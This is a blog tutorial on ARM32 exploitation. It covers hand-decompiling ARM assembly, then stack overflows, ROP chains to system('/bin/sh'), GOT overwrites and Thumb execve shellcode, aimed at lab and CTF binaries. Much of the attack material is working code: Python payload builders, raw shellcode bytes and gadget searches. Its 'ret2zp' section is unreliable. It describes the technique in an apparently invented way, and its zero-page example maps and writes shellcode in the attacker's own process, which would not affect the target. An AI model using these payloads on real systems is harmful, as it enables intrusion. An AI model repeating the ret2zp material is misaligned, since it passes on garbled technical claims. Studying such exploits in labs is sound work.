Skip to content
armarm32pwnropret2zpbinary-exploitationgotplt

ARM Exploitation Series: From Hand-Ray to ret2zp

15 min read

Overview

This post collects what I learned while studying ARM binary exploitation. It starts with hand-ray (reading assembly by hand), moves through classic stack buffer overflows, and finishes with the ret2zp technique. All experiments were run in a QEMU ARM32 environment using a Debian Wheezy (armhf) image.

The learning order follows a natural difficulty curve:

  1. ARM architecture fundamentals and assembly hand-ray
  2. Stack-based exploitation (buffer overflow, saved register control)
  3. Advanced Return-Oriented Programming on ARM32
  4. ret2zp: bypassing zero-page protection

Environment Setup

Analyzing ARM binaries requires an ARM environment. I used QEMU with a Debian Wheezy armhf image:

sudo apt-get install qemu
 
wget https://people.debian.org/~aurel32/qemu/armhf/debian_wheezy_armhf_standard.qcow2
wget https://people.debian.org/~aurel32/qemu/armhf/initrd.img-3.2.0-4-vexpress
wget https://people.debian.org/~aurel32/qemu/armhf/vmlinuz-3.2.0-4-vexpress
 
qemu-system-arm -M vexpress-a9 \
  -kernel vmlinuz-3.2.0-4-vexpress \
  -initrd initrd.img-3.2.0-4-vexpress \
  -drive if=sd,file=debian_wheezy_armhf_standard.qcow2 \
  -append "root=/dev/mmcblk0p2 console=ttyAMA0" \
  -redir tcp:2222::22 -redir tcp:8080::80 \
  -nographic

SSHing into port 2222 gives you a shell inside the ARM guest.


ARM Architecture Fundamentals

Registers

ARM32 has 16 general-purpose registers (r0-r15), some of which carry special roles:

Register Alias Role
r0-r3 — Function arguments (up to 4); r0 holds the return value
r11 FP Frame pointer (similar to x86's EBP)
r13 SP Stack pointer
r14 LR Link register — holds the return address after a BL/BLX call
r15 PC Program counter (equivalent to x86's EIP/RIP)

When a function needs more than 4 arguments, the rest are passed on the stack.

Calling Convention (AAPCS)

Arguments:    r0, r1, r2, r3  (the rest on the stack)
Return value: r0
LR storage:   pushed to the stack in the function prologue

A typical ARM function prologue/epilogue structure:

; prologue
push {r7, lr}       ; save frame pointer and return address
sub  sp, #8         ; reserve local stack space
add  r7, sp, #0     ; r7 = sp (frame pointer)
 
; epilogue
mov  sp, r7         ; restore stack pointer
pop  {r7, pc}       ; restore frame pointer; pc = saved lr -> return

The key difference from x86: there is no explicit ret instruction. Returning is done by loading the saved LR value into PC, usually via pop {r7, pc} or bx lr.

ARM vs Thumb Mode

ARM supports two instruction set states:

  • ARM mode: 32-bit fixed-width instructions
  • Thumb mode: 16-bit compact instructions (Thumb) or 32-bit (Thumb-2)

Mode switches happen via BX/BLX instructions. If the LSB (least significant bit) of the target address is 1, execution switches to Thumb mode:

add r3, pc, #1    ; r3 = pc + 1 (Thumb target)
bx  r3            ; Branch and Exchange -> switch to Thumb mode

Instruction Pipeline

ARM uses a 3-stage pipeline (Fetch -> Decode -> Execute). Because the three stages run in parallel, PC already points 8 bytes ahead by the Execute stage (in ARM mode; 4 bytes in Thumb mode). This matters when writing shellcode that computes relative addresses.

Memory Access Instructions

STR r0, [r7, #4]    ; *(r7 + 4) = r0   (store)
LDR r3, [r7, #4]    ; r3 = *(r7 + 4)   (load)

STR's operand order is the reverse of MOV — the source register comes first, the destination address second. This trips up a lot of people new to ARM.


Phase 1: ARM Assembly Hand-Ray

Before touching an exploit, you need to be able to read ARM disassembly and reconstruct the original C source. This is what's called "hand-ray" — decompiling by hand.

Disassembly of an ARM v5 hand-ray practice binary (a program that prints a star pattern)

Let's start with the core principles:

  • Save a register, push it to the stack, jump, then reload it -> likely a for-loop
  • pc + #constant form -> a string address
  • A value placed in a register and stored to the stack -> a variable. In a loop, it gets reloaded and compared

Reading Loops

The key pattern for recognizing a loop in ARM assembly:

  • Variable initialization — store a constant to the stack
  • Jump to the condition check — B <cmp_label>
  • Comparison — LDR r3, [sp, #offset] + CMP r3, #limit
  • Conditional branch — BLE <body> / BGT <exit>
  • Increment — LDR r3 + ADD r3, #1 + STR r3

Example: for (i = 0; i <= 4; i++) printf("%d ", i);

; i = 0, stored at [sp, #4]
mov  r3, #0
str  r3, [sp, #4]
b    main+44         ; jump to condition check
 
; loop body (main+28)
ldr  r1, [sp, #4]
movw r0, #<format>   ; "%d "
bl   printf
 
; increment (main+40)
ldr  r3, [sp, #4]
add  r3, r3, #1
str  r3, [sp, #4]
 
; condition check (main+44)
ldr  r3, [sp, #4]
cmp  r3, #4
ble  main+28         ; if i <= 4, back to loop body

Whichever kind of loop it is (while, for), the assembly pattern looks similar.

Reading if/else

An important ARM trait: in an if/else structure, the assembler usually emits the else branch first. The condition in the CMP/branch pair is inverted from what you'd expect.

// original C source
if (v1 > 3)
    printf("i > 4\n");
else
    printf("else branch\n");
; v1 = 5, stored at [sp, #8]
ldr  r3, [sp, #8]
cmp  r3, #3
bgt  <if_body>       ; if v1 > 3, jump to the if body
                     ; else is the fall-through
movw r0, #<"else branch">
bl   printf
b    <end>
 
<if_body>:
movw r0, #<"i > 4">
bl   printf
 
<end>:

Reading User-Defined Functions

The pattern when a user function is called via BL / BLX:

  • Arguments are placed in r0-r3 before the call
  • The callee saves r0-r3 into local copies on its own stack frame
  • The return value comes back in r0
; call to add(v1, v2):
ldr  r4, [sp, #4]    ; v1
ldr  r5, [sp, #8]    ; v2
mov  r1, r5
mov  r0, r4
bl   add
 
; inside add():
str  r0, [sp, #4]    ; store arg1 locally
str  r1, [sp, #0]    ; store arg2 locally
ldr  r2, [sp, #4]
ldr  r3, [sp, #0]
add  r3, r2, r3      ; r3 = arg1 + arg2
mov  r0, r3          ; return value in r0
pop  {r7, pc}

Reconstructed C code:

int add(int arg1, int arg2) {
    int loc1 = arg1;
    int loc2 = arg2;
    return loc1 + loc2;
}

The IT (If-Then) Instruction

ARM Thumb-2 has an IT instruction that conditionally executes up to 4 instructions without a branch:

cmp  r0, r1
itge            ; if r0 >= r1
movge r0, r1    ; r0 = r1

This is equivalent to:

if (r0 >= r1) r0 = r1;

Phase 2: Analyzing root-me.org's ARM Stack Buffer Overflow

This challenge is a good example combining ARM hand-ray practice with real vulnerability analysis.

; setvbuf(stdout, 0, 2, 0);
; 0x21008 = stdout, r0 = stdout, r1 = 0, r2 = 2, r3 = 0
setvbuf(stdout, 0, 2, 0);
 
; v1 = 0x79 // sp+7
; r11 = "Give me data to dump:\n"
printf("Give me data to dump:\n");
 
; r10 = "%[^\n]s"
; num = sp+8
if (scanf("%[^\n]s", &num) != 0)
    ...

The key vulnerability: the %[^\n]s format string reads with no width limit until a newline appears. This is an unbounded scanf vulnerability.

  • Local variable layout: sp+7 = v1(char), sp+8 = buffer(scanf)
  • A sufficiently long input into num (sp+8) can overwrite saved registers and the return address

Phase 3: Stack Buffer Overflow — Controlling r11 and PC

The Vulnerable Pattern

A typical vulnerable function example (Incognito 2013 Basic ARM Exploit):

void vuln(char *input) {
    char buffer[16];
    strcpy(buffer, input);   // no bounds checking
}
 
void gotashell() {
    system("/bin/sh");
}
 
int main(int argc, char *argv[]) {
    if (argc < 2) { puts("argv error"); exit(0); }
    vuln(argv[1]);
    return 0;
}

Stack Layout Inside vuln()

[  buffer (16 bytes)  ] [  saved r11 (4 bytes)  ] [  saved LR (4 bytes)  ]
^--- sp                                                                   ^--- sp+24

The strcpy overflow goes past buffer[16] and overwrites the saved r11 at offset 16 and the saved LR (return address) at offset 20.

The Exploit

The function epilogue on ARM32 looks like:

pop {r11, pc}   ; saved_r11 -> r11, saved_lr -> pc

We trigger the overflow with the following payload:

payload = b'A' * 16 + p32(dummy_r11) + p32(gotashell_addr)

When pop {r11, pc} executes:

  • r11 = the dummy value we supplied
  • pc = the gotashell address -> control flow hijacked

Finding the gotashell address:

$ arm-linux-gnueabihf-objdump -d vuln | grep gotashell
00008468 <gotashell>:

Exploit:

import struct
import subprocess
 
gotashell = 0x8468
payload = b'A' * 16 + struct.pack('<I', 0xdeadbeef) + struct.pack('<I', gotashell)
subprocess.run(['./vuln', payload])

After the strcpy, the saved r11 slot and PC are replaced with our values, jumping to gotashell.


Phase 4: ret2plt / GOT Overwrite

Once you control the return address, the next step is calling a library function with controlled arguments. On ARM32 without ASLR, you can return directly to system@plt.

The key difference from x86: arguments are passed via registers, not the stack. You can't simply push a string address and call system. You first need a gadget that loads the /bin/sh address into r0.

Gadget Hunting

ROPgadget --binary ./target --rop | grep "pop {r0"

A useful gadget pattern:

0x000104d4 : pop {r0, r4, pc}

What this gadget does:

  1. Pops the next stack value into r0 (the argument to system)
  2. Pops a dummy value into r4
  3. Pops the next address into PC (jumping into system)

Building the ROP Chain

import struct
 
def p32(x):
    return struct.pack('<I', x)
 
# addresses (no ASLR)
pop_r0_r4_pc = 0x000104d4
system_plt   = 0x00010510
bin_sh_addr  = 0x0001a9f0   # address of the "/bin/sh" string in libc
 
buf_size = 64   # offset up to the saved LR
 
payload  = b'A' * buf_size
payload += p32(pop_r0_r4_pc)   # overwrite saved LR with the gadget
payload += p32(bin_sh_addr)    # r0 = "/bin/sh"
payload += p32(0xdeadbeef)     # r4 = junk
payload += p32(system_plt)     # pc = system@plt

Execution flow:

  1. pop {r0, r4, pc} executes -> r0 = /bin/sh, pc = system@plt
  2. system("/bin/sh") -> shell obtained

GOT Overwrite Alternative

If you have an arbitrary-write primitive (format string, another overflow, etc.), overwriting the GOT entry of a frequently called function (e.g. printf) with the address of system is also effective:

GOT[printf] = system
// afterwards, calling printf("command") -> system("command")

Phase 5: ret2zp — Zero-Page Return

What Is ret2zp?

ret2zp (return-to-zero-page) is an ARM-specific exploitation technique. On ARM, the zero page (addresses near 0x0) is sometimes writable and executable on older kernels or embedded systems without proper memory protection.

The core idea: if an attacker controls an address near 0x00000000 and can mmap/write shellcode there, returning to the zero page bypasses many mitigation checks that assume returns land within loaded library regions.

Writing ARM Shellcode

Before understanding ret2zp, let's look at writing ARM shellcode. The ARM32 syscall interface:

  • The syscall number goes in r7
  • Arguments go in r0, r1, r2
  • Invoked with svc #0 (or svc #1 in some environments)

execve is syscall number 11 (__NR_execve).

.section .text
.global _start
 
_start:
.code 32                  ; start in ARM mode
    add r3, pc, #1        ; compute the thumb target (pc+1)
    bx  r3                ; switch to Thumb mode
 
.code 16                  ; Thumb mode from here on
    mov  r0, pc           ; r0 = pc (points ahead due to the pipeline)
    add  r0, #10          ; r0 = address of the "/bin/sh" string
    str  r0, [sp, #4]     ; store the pointer on the stack
    add  r1, sp, #4       ; r1 = &argv = {&"/bin/sh"}
    sub  r2, r2, r2       ; r2 = 0 (envp = NULL)
    mov  r7, #11          ; r7 = __NR_execve
    svc  1                ; make the syscall
 
.ascii "/bin/sh"

Key points:

  1. Switching from ARM to Thumb mode — the add r3, pc, #1 encoding avoids null bytes
  2. The PC pipeline offset (ARM +8, Thumb +4) must be accounted for when computing the string address
  3. sub r2, r2, r2 is used instead of mov r2, #0 to avoid null bytes in the shellcode

Setting Up the Vulnerable Program

#include <stdio.h>
#include <string.h>
 
void vuln(char *s) {
    char buf[64];
    strcpy(buf, s);
}
 
int main(int argc, char *argv[]) {
    vuln(argv[1]);
    return 0;
}

Compile with no stack canary, no NX (or an executable stack), and no ASLR.

Exploitation Strategy

In x86 ROP, arguments go on the stack, but ARM RTL (Return to Library / ret2zp) requires:

  1. r0 = pointer to /bin/sh (system's first argument)
  2. PC = system or execve

Option A — gadget chain:

[buf overflow] -> [pop {r0, pc} gadget] -> [/bin/sh address] -> [system address]

Option B — ret2zp on non-ASLR ARM:

Write shellcode at address 0x00000010 (or another low address) and redirect PC there. On ARM without XN (eXecute Never) enforcement:

import struct
import ctypes
 
# mmap the zero page as writable+executable
libc = ctypes.CDLL("libc.so.6")
libc.mmap(0, 0x1000, 7, 0x32, -1, 0)  # MAP_FIXED|MAP_ANONYMOUS, PROT_RWX
 
# write ARM shellcode at 0x10
shellcode = (
    b"\x01\x30\x8f\xe2"  # add r3, pc, #1 (ARM mode)
    b"\x13\xff\x2f\xe1"  # bx r3 (switch to Thumb)
    # Thumb shellcode
    b"\x78\x46"          # mov r0, pc
    b"\x0a\x30"          # add r0, #10
    b"\x01\x90"          # str r0, [sp, #4]
    b"\x01\xa9"          # add r1, sp, #4
    b"\x52\x40"          # eor r2, r2
    b"\x0b\x27"          # mov r7, #11
    b"\x01\xdf"          # svc 1
    b"/bin/sh\x00"
)
 
ctypes.memmove(0x10, shellcode, len(shellcode))
 
# overwrite the return address with 0x10
buf = b'A' * 68 + struct.pack('<I', 0x00000010)

Why the Zero Page Worked on ARM

On ARM, the interrupt vector table historically sat at address 0x00000000. On some embedded systems and older Linux kernels:

  • Userspace could mmap the zero page (mmap at 0 with MAP_FIXED)
  • The XN (eXecute Never) bit wasn't enforced on low addresses

For this reason, ret2zp was a practical technique before kernel hardening (sysctl vm.mmap_min_addr) became standard.

Modern Mitigations

Mitigation Effect
vm.mmap_min_addr = 65536 Prevents mmap below 64KB
XN bit enforcement (ARMv6+) Marks data pages as non-executable
ASLR Randomizes library/stack addresses
Stack canary Detects stack smashing before return
PIE Randomizes the binary's base address

On a fully hardened modern Linux ARM system, ret2zp alone doesn't work. An ASLR bypass (an info leak) is needed first.


Key Differences from x86 Exploitation

Aspect x86/x64 ARM32
Return mechanism ret pops stack -> EIP pop {pc} or bx lr
Function arguments stack (x86) / rdi,rsi,... (x64) r0, r1, r2, r3
Frame pointer EBP r11
Link register return address lives only on the stack dedicated LR (r14) register
Instruction width variable (1-15 bytes) fixed 4 bytes ARM / 2 bytes Thumb
Gadget search ends in ret ends in pop {pc} or bx lr
Null-free shellcode a common technique Thumb mode gives denser encoding
Zero-page attacks rare (NX always enforced) historically possible on embedded ARM

Tips for Finding ARM ROP Gadgets

When building an ARM32 ROP chain:

  1. Look for pop {rN, ..., pc} gadgets — they give both register control and PC redirection in one gadget
  2. bx lr gadgets require LR to already be loaded
  3. Thumb-2's IT blocks create conditional gadgets — useful but complex
  4. Functions like __libc_csu_init also contain useful pop chains
# search for ARM pop-pc gadgets
ROPgadget --binary ./libc.so --rop | grep "pop {r0" | head -20
ROPgadget --binary ./libc.so --rop | grep "pop {r1" | head -20
 
# Thumb gadgets (address's bit 0 is 1)
ROPgadget --binary ./libc.so --thumb | grep "pop"

Summary

What this ARM exploitation series covered:

  1. ARM assembly fundamentals — register roles, calling convention, the pipeline's effect on PC, STR/LDR semantics
  2. Hand-ray — reconstructing C source from ARM disassembly: loops, if/else (else emitted first), function calls
  3. ARM shellcode — ARM/Thumb mode switching, the syscall interface, removing null bytes
  4. Stack BOF — hijacking control flow by overflowing saved r11 and LR
  5. ret2plt / GOT overwrite — using ROP gadgets that satisfy ARM's register-based calling convention
  6. ret2zp — exploiting the possibility of mapping the ARM zero page on older/embedded systems

The most important mental shift when moving from x86 to ARM exploitation: arguments live in registers, not on the stack. Any exploitation technique that relies on stack-based argument passing has to be rebuilt around gadgets that fill r0-r3 before the final call.